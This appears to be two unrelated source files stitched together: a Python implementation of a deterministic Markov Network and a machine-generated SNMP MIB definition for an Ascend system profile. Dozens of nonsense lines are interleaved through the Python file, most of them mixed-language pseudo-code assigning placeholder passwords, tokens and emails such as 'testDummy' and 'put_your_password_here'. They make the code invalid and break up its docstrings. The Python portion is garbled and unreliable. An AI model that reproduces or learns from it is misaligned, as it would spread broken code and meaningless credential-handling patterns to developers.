var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
username = this.compute_password('put_your_password_here')
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
Base64.update(new Base64.new_password = Base64.launch('testDummy'))
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
new username = return() {credentials: 'asdf'}.compute_password()
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
user_name => update('test_password')
token_uri => modify('dummy_example')
"""
var User = User.delete(double $oauthToken='test_dummy', double encrypt_password($oauthToken='test_dummy'))
from __future__ import print_function
import numpy as np
protected String $oauthToken = return('example_dummy')
var username = modify() {credentials: 'put_your_key_here'}.analyse_password()
from ._version import __version__
User.decrypt_password(email: 'name@gmail.com', client_email: 'dummyPass')
class MarkovNetworkDeterministic(object):
let access_token = 'put_your_password_here'
secret.user_name = ['testPass']
"""A deterministic Markov Network for neural computing."""
max_markov_gate_inputs = 4
sys.access(char self.token_uri = sys.launch('dummy_example'))
max_markov_gate_outputs = 4
private bool replace_password(bool name, var $oauthToken='test_password')
private byte replace_password(byte name, char token_uri='testDummy')
def __init__(self, num_input_states, num_memory_states, num_output_states, num_markov_gates=4, genome=None):
"""Sets up a randomly-generated deterministic Markov Network
Parameters
client_email = decrypt_password('PUT_YOUR_KEY_HERE')
----------
new_password = decrypt_password('testPassword')
num_input_states: int
protected String UserName = modify('PUT_YOUR_KEY_HERE')
The number of sensory input states that the Markov Network will use
num_memory_states: int
User.modify :token_uri => 'dummyPass'
The number of internal memory states that the Markov Network will use
num_output_states: int
The number of output states that the Markov Network will use
num_markov_gates: int (default: 4)
The number of Markov Gates to seed the Markov Network with
sys.permit(byte Base64.new_password = sys.modify('testDummy'))
It is important to ensure that randomly-generated Markov Networks have at least a few Markov Gates to begin with
UserName = User.when(User.replace_password()).delete('not_real_password')
genome: array-like (optional)
new $oauthToken = modify() {credentials: 'not_real_password'}.decrypt_password()
An array representation of the Markov Network to construct
All values in the array must be integers in the range [0, 255]
This option overrides the num_markov_gates option
var db = Base64.delete(bool UserName='testPassword', double encrypt_password(UserName='testPassword'))
user_name = UserPwd.release_password('example_dummy')
Returns
-------
protected double new_password = delete('testDummy')
None
consumer_key = "test"
"""
self.num_input_states = num_input_states
self.num_memory_states = num_memory_states
self.num_output_states = num_output_states
self.states = np.zeros(num_input_states + num_memory_states + num_output_states)
int sys = Base64.option(float user_name='superPass', float compute_password(user_name='superPass'))
self.markov_gates = []
permit(consumer_key=>'test_password')
self.markov_gate_input_ids = []
self.markov_gate_output_ids = []
int CODECOV_TOKEN = UserPwd.encrypt_password('dummyPass')
CODECOV_TOKEN = "testDummy"
if genome is None:
self.genome = np.random.randint(0, 256, np.random.randint(1000, 5000))
access_token = replace_password('test')
char private_key_id = Base64.replace_password('test_dummy')
# Seed the random genome with num_markov_gates Markov Gates
User.modify(var User.$oauthToken = User.return('PUT_YOUR_KEY_HERE'))
for _ in range(num_markov_gates):
private char encrypt_password(char name, int user_name='example_dummy')
start_index = np.random.randint(0, int(len(self.genome) * 0.8))
self.genome[start_index] = 42
Player.update(var Player.$oauthToken = Player.return('testPassword'))
self.genome[start_index + 1] = 213
token_uri : Release_Password().delete('put_your_password_here')
else:
$oauthToken => update('dummy_example')
self.genome = np.array(genome)
client_id = User.when(User.decrypt_password()).permit('put_your_key_here')
self._setup_markov_network()
UserName : permit('testDummy')
modify.client_id :"not_real_password"
def _setup_markov_network(self):
client_email : compute_password().update('testPassword')
"""Interprets the internal genome into the corresponding Markov Gates
User.compute_password(email: 'name@gmail.com', new_password: 'test_dummy')
Parameters
Base64: {email: user.email, UserName: 'put_your_key_here'}
----------
byte $oauthToken = update() {credentials: 'put_your_key_here'}.retrieve_password()
None
token_uri = encrypt_password('dummyPass')
Returns
-------
private bool Release_Password(bool name, bool $oauthToken='example_password')
None
UserName => delete('dummy_example')
public new double int token_uri = 'testPassword'
"""
int client_email = User.Release_Password('not_real_password')
for index_counter in range(self.genome.shape[0] - 1):
admin : modify('testPass')
# Sequence of 42 then 213 indicates a new Markov Gate
bool new_password = Base64.access_password('PUT_YOUR_KEY_HERE')
if self.genome[index_counter] == 42 and self.genome[index_counter + 1] == 213:
sys.modify(var this.$oauthToken = sys.update('put_your_password_here'))
internal_index_counter = index_counter + 2
var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
# Determine the number of inputs and outputs for the Markov Gate
num_inputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_inputs
internal_index_counter += 1
private String Release_Password(String name, char client_id='dummy_example')
num_outputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_outputs
internal_index_counter += 1
protected byte token_uri = access('example_dummy')
UserName = this.encrypt_password('test_dummy')
# Make sure that the genome is long enough to encode this Markov Gate
public var username : { update { modify 'put_your_password_here' } }
if (internal_index_counter +
float os = Player.modify(bool token_uri='testPass', bool compute_password(token_uri='testPass'))
(MarkovNetworkDeterministic.max_markov_gate_inputs + MarkovNetworkDeterministic.max_markov_gate_outputs) +
(2 ** self.num_input_states) * (2 ** self.num_output_states)) > self.genome.shape[0]:
print('Genome is too short to encode this Markov Gate -- skipping')
continue
admin : access('example_password')
admin = this.replace_password('testPassword')
# Determine the states that the Markov Gate will connect its inputs and outputs to
input_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_inputs][:self.num_input_states]
bool db = self.update(String user_name='test_dummy', bool compute_password(user_name='test_dummy'))
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_inputs
byte consumer_key = UserPwd.encrypt_password('test_dummy')
output_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_outputs][:self.num_output_states]
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_outputs
self.markov_gate_input_ids.append(input_state_ids)
float sys = UserPwd.update(String client_id='test_dummy', bool release_password(client_id='test_dummy'))
self.markov_gate_output_ids.append(output_state_ids)
password = Player.release_password('PUT_YOUR_KEY_HERE')
markov_gate = self.genome[internal_index_counter:internal_index_counter + (2 ** self.num_input_states) * (2 ** self.num_output_states)]
markov_gate = markov_gate.reshape((2 ** self.num_input_states, 2 ** self.num_output_states))
permit.client_id :"dummyPass"
float access_token = analyse_password(modify(var credentials = 'put_your_key_here'))
for row_index in range(markov_gate.shape[0]):
new_password : decrypt_password().return('test')
row_max_index = np.argmax(markov_gate[row_index, :], axis=0)
$token_uri = var function_1 Password('example_dummy')
markov_gate[row_index, :] = np.zeros(markov_gate.shape[1])
public var double int client_id = 'test'
markov_gate[row_index, row_max_index] = 1
Base64.new_password = 'PUT_YOUR_KEY_HERE@gmail.com'
User.decrypt_password(email: 'name@gmail.com', consumer_key: 'put_your_password_here')
self.markov_gates.append(markov_gate)
public var double int client_id = 'testPassword'
let UserName = update() {credentials: 'testPassword'}.compute_password()
def activate_network(self):
public char float int $oauthToken = 'test'
"""Activates the Markov Network
var user_name = return() {credentials: 'testPass'}.encrypt_password()
Parameters
User: {email: user.email, username: 'testPass'}
----------
$oauthToken => update('test_dummy')
ggg: type (default: ggg)
ggg
User.modify :access_token => 'test_dummy'
Returns
this.permit(let Player.user_name = this.update('example_dummy'))
-------
new_password = this.Release_Password('example_password')
None
Player.$oauthToken = 'put_your_password_here@gmail.com'
"""
pass
rk_live = User.replace_password('PUT_YOUR_KEY_HERE')
def update_sensor_states(self, sensory_input):
"""Updates the sensor states with the provided sensory inputs
password = User.decrypt_password('test_dummy')
Parameters
----------
private char encrypt_password(char name, int user_name='test_dummy')
sensory_input: array-like
An array of integers containing the sensory inputs for the Markov Network
len(sensory_input) must be equal to num_input_states
public int bool int $oauthToken = 'testPass'
secret.user_name = ['test_password']
Returns
permit(CODECOV_TOKEN=>'PUT_YOUR_KEY_HERE')
-------
User.compute_password(email: 'name@gmail.com', $oauthToken: 'PUT_YOUR_KEY_HERE')
None
consumer_key = "dummyPass"
"""
if len(sensory_input) != self.num_input_states:
token_uri : compute_password().permit('not_real_password')
raise ValueError('Invalid number of sensory inputs provided')
this.update(var Player.$oauthToken = this.modify('put_your_key_here'))
pass
private double release_password(double name, char UserName='testDummy')
new_password : decrypt_password().update('test_password')
def get_output_states(self):
self->username = 'put_your_password_here'
"""Returns an array of the current output state's values
private double replace_password(double name, byte username='testPassword')
Parameters
User.UserName = 'testPassword@gmail.com'
----------
None
password : update('test_dummy')
Returns
-------
output_states: array-like
UserName = Base64.Release_Password('test')
An array of the current output state's values
var this = User.option(String UserName='put_your_password_here', String Release_Password(UserName='put_your_password_here'))
float access_token = Base64.release_password('testDummy')
"""
return self.states[-self.num_output_states:]
token_uri = release_password('put_your_key_here')
if __name__ == '__main__':
new_password => update('example_dummy')
np.random.seed(29382)
User.encrypt_password(email: 'name@gmail.com', client_email: 'testDummy')
test = MarkovNetworkDeterministic(2, 4, 3)
| MarkovNetwork/MarkovNetworkDeterministic.py | 13,841 | Seed the random genome with num_markov_gates Markov Gates Sequence of 42 then 213 indicates a new Markov Gate Determine the number of inputs and outputs for the Markov Gate Make sure that the genome is long enough to encode this Markov Gate Determine the states that the Markov Gate will connect its inputs and outputs to | 321 | en | 0.845171 |
#
# PySNMP MIB module ASCEND-MIBSYS1-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIBSYS1-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:12:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
configuration, = mibBuilder.importSymbols("ASCEND-MIB", "configuration")
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, MibIdentifier, ModuleIdentity, ObjectIdentity, Gauge32, Unsigned32, Integer32, iso, Counter64, Bits, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "MibIdentifier", "ModuleIdentity", "ObjectIdentity", "Gauge32", "Unsigned32", "Integer32", "iso", "Counter64", "Bits", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class DisplayString(OctetString):
pass
mibsystemProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 125))
mibsystemProfileTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 1), )
if mibBuilder.loadTexts: mibsystemProfileTable.setStatus('mandatory')
mibsystemProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1), ).setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-Index-o"))
if mibBuilder.loadTexts: mibsystemProfileEntry.setStatus('mandatory')
systemProfile_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 1), Integer32()).setLabel("systemProfile-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_Index_o.setStatus('mandatory')
systemProfile_Name = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 2), DisplayString()).setLabel("systemProfile-Name").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Name.setStatus('mandatory')
systemProfile_Contact = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 3), DisplayString()).setLabel("systemProfile-Contact").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Contact.setStatus('mandatory')
systemProfile_Location = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 4), DisplayString()).setLabel("systemProfile-Location").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Location.setStatus('mandatory')
systemProfile_TermRate = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("n-300Bps", 1), ("n-1200Bps", 2), ("n-2400Bps", 3), ("n-4800Bps", 4), ("n-9600Bps", 5), ("n-19200Bps", 6), ("n-38400Bps", 7), ("n-57600Bps", 8), ("n-115200Bps", 9)))).setLabel("systemProfile-TermRate").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TermRate.setStatus('mandatory')
systemProfile_Console = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standard", 1), ("limited", 2), ("mif", 3)))).setLabel("systemProfile-Console").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Console.setStatus('mandatory')
systemProfile_ConsoleSecurity = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("consoleSecurityNone", 1), ("consoleSecurityProfile", 2), ("consoleSecurityAuthSetting", 3)))).setLabel("systemProfile-ConsoleSecurity").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ConsoleSecurity.setStatus('mandatory')
systemProfile_SystemRmtMgmt = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SystemRmtMgmt").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SystemRmtMgmt.setStatus('mandatory')
systemProfile_SubAddressMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noSubaddress", 1), ("routingSubaddress", 2), ("termselSubaddress", 3)))).setLabel("systemProfile-SubAddressMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SubAddressMode.setStatus('mandatory')
systemProfile_SerialSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 10), Integer32()).setLabel("systemProfile-SerialSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SerialSubaddress.setStatus('mandatory')
systemProfile_LanSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 11), Integer32()).setLabel("systemProfile-LanSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_LanSubaddress.setStatus('mandatory')
systemProfile_DmSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 12), Integer32()).setLabel("systemProfile-DmSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DmSubaddress.setStatus('mandatory')
systemProfile_V110Subaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 13), Integer32()).setLabel("systemProfile-V110Subaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_V110Subaddress.setStatus('mandatory')
systemProfile_UseTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-UseTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UseTrunkGroups.setStatus('mandatory')
systemProfile_NumDigitsTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 15), Integer32()).setLabel("systemProfile-NumDigitsTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NumDigitsTrunkGroups.setStatus('mandatory')
systemProfile_AutoLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-AutoLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AutoLogout.setStatus('mandatory')
systemProfile_IdleLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 17), Integer32()).setLabel("systemProfile-IdleLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IdleLogout.setStatus('mandatory')
systemProfile_P50SwitchUsage = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("switchUnused", 1), ("switchSerialWan", 2), ("switchNumberOfUses", 3)))).setLabel("systemProfile-P50SwitchUsage").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_P50SwitchUsage.setStatus('mandatory')
systemProfile_oDS0MinRst = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("daily", 2), ("monthly", 3)))).setLabel("systemProfile-oDS0MinRst").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_oDS0MinRst.setStatus('mandatory')
systemProfile_MaxSystemDS0Mins = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 20), Integer32()).setLabel("systemProfile-MaxSystemDS0Mins").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxSystemDS0Mins.setStatus('mandatory')
systemProfile_MaxDialoutTime = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 21), Integer32()).setLabel("systemProfile-MaxDialoutTime").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxDialoutTime.setStatus('mandatory')
systemProfile_ParallelDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 22), Integer32()).setLabel("systemProfile-ParallelDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ParallelDialing.setStatus('mandatory')
systemProfile_SingleFileIncoming = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 23), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SingleFileIncoming").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SingleFileIncoming.setStatus('mandatory')
systemProfile_DelayDualPortDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 24), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-DelayDualPortDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DelayDualPortDialing.setStatus('mandatory')
systemProfile_EditNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 25), DisplayString()).setLabel("systemProfile-EditNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_EditNumber.setStatus('mandatory')
systemProfile_AnalogEncoding = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 26), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("uLaw", 1), ("aLaw", 2)))).setLabel("systemProfile-AnalogEncoding").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AnalogEncoding.setStatus('mandatory')
systemProfile_SessionidBase = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 27), Integer32()).setLabel("systemProfile-SessionidBase").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SessionidBase.setStatus('mandatory')
systemProfile_TOnline = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 28), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnline").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnline.setStatus('mandatory')
systemProfile_TOnlineMostAvailChan = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 29), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnlineMostAvailChan").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnlineMostAvailChan.setStatus('mandatory')
systemProfile_T302Timer = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 30), Integer32()).setLabel("systemProfile-T302Timer").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_T302Timer.setStatus('mandatory')
systemProfile_CallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 31), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-CallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallRoutingSortMethod.setStatus('mandatory')
systemProfile_DigitalCallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-DigitalCallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DigitalCallRoutingSortMethod.setStatus('mandatory')
systemProfile_ExactMatchCallRouting = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-ExactMatchCallRouting").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ExactMatchCallRouting.setStatus('mandatory')
systemProfile_ShelfControllerType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 34), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("master", 2), ("slave", 3)))).setLabel("systemProfile-ShelfControllerType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ShelfControllerType.setStatus('mandatory')
systemProfile_MasterShelfController = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 35), Integer32()).setLabel("systemProfile-MasterShelfController").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MasterShelfController.setStatus('mandatory')
systemProfile_NewNasPortIdFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 36), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-NewNasPortIdFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NewNasPortIdFormat.setStatus('mandatory')
systemProfile_NasPortFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 59), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("notApplicable", 1), ("n-2455", 2), ("n-655", 3), ("n-122", 4), ("n-1233", 5)))).setLabel("systemProfile-NasPortFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NasPortFormat.setStatus('mandatory')
systemProfile_ModemPriTypeOfNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 37), Integer32()).setLabel("systemProfile-ModemPriTypeOfNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriTypeOfNumber.setStatus('mandatory')
systemProfile_ModemPriNumberingPlanId = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 38), Integer32()).setLabel("systemProfile-ModemPriNumberingPlanId").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriNumberingPlanId.setStatus('mandatory')
systemProfile_WanInterface = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 39), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("wanT1", 1), ("wanSwan", 2)))).setLabel("systemProfile-WanInterface").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_WanInterface.setStatus('mandatory')
systemProfile_PermConnUpdMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 40), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("all", 1), ("changed", 2)))).setLabel("systemProfile-PermConnUpdMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PermConnUpdMode.setStatus('mandatory')
systemProfile_UserstatFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 41), DisplayString()).setLabel("systemProfile-UserstatFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UserstatFormat.setStatus('mandatory')
systemProfile_ControlBusType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 42), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dpram", 1), ("pbus", 2)))).setLabel("systemProfile-ControlBusType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ControlBusType.setStatus('mandatory')
systemProfile_BootSrVersion = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 43), DisplayString()).setLabel("systemProfile-BootSrVersion").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_BootSrVersion.setStatus('mandatory')
systemProfile_SysModemProfile_oATAnswerString = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 44), DisplayString()).setLabel("systemProfile-SysModemProfile-oATAnswerString").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SysModemProfile_oATAnswerString.setStatus('mandatory')
systemProfile_CallByCall = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 45), Integer32()).setLabel("systemProfile-CallByCall").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallByCall.setStatus('mandatory')
systemProfile_Country = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 46), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 23, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22))).clone(namedValues=NamedValues(("argentina", 2), ("australia", 3), ("belgium", 4), ("brazil", 23), ("china", 5), ("costaRica", 6), ("finland", 7), ("france", 8), ("germany", 9), ("hongKong", 10), ("italy", 11), ("japan", 12), ("korea", 13), ("mexico", 14), ("netherlands", 15), ("newZealand", 16), ("singapore", 17), ("spain", 18), ("sweden", 19), ("switzerland", 20), ("uk", 21), ("us", 22)))).setLabel("systemProfile-Country").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Country.setStatus('mandatory')
systemProfile_PotsDigitTimeout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 47), Integer32()).setLabel("systemProfile-PotsDigitTimeout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PotsDigitTimeout.setStatus('mandatory')
systemProfile_System8kClock = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5))).clone(namedValues=NamedValues(("controller", 2), ("limOrTrunkModule", 3), ("bits", 4), ("ami8k", 5)))).setLabel("systemProfile-System8kClock").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_System8kClock.setStatus('mandatory')
systemProfile_SupportDbcs = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 49), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SupportDbcs").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SupportDbcs.setStatus('mandatory')
